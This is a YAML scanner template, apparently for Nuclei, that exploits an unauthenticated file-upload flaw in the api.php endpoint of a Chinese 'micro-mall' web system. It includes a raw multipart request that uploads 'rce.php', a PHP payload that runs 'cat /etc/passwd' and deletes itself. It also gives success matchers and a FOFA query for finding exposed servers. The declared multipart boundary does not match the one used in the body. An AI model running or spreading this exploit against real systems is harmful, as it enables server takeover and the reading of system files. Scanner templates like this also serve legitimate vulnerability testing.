id: weishangchen-api-fileupload
info:
  name: 微商城系统 api.php - 文件上传
  author: leadlife
  severity: critical
  description: 微商城系统 api.php 接口处存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E5%BE%AE%E5%95%86%E5%9F%8E%E7%B3%BB%E7%BB%9F/%E5%BE%AE%E5%95%86%E5%9F%8E%E7%B3%BB%E7%BB%9Fapi.php%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="/Mao_Public/js/jquery-2.1.1.min.js"
  tags: fileupload,weishangcheng

http:
  - raw:
      - |
        POST /api/api.php?mod=upload&type=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown
        
        ------WebKitFormBoundaryaKljzbg49Mq4ggLz
        Content-Disposition: form-data; name="file"; filename="rce.php"
        Content-Type: image/png
        
        <?php system("cat /etc/passwd");unlink(__FILE__);?>
        ------WebKitFormBoundaryaKljzbg49Mq4ggLz--

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'code','msg','上传成功','data','name')
        condition: and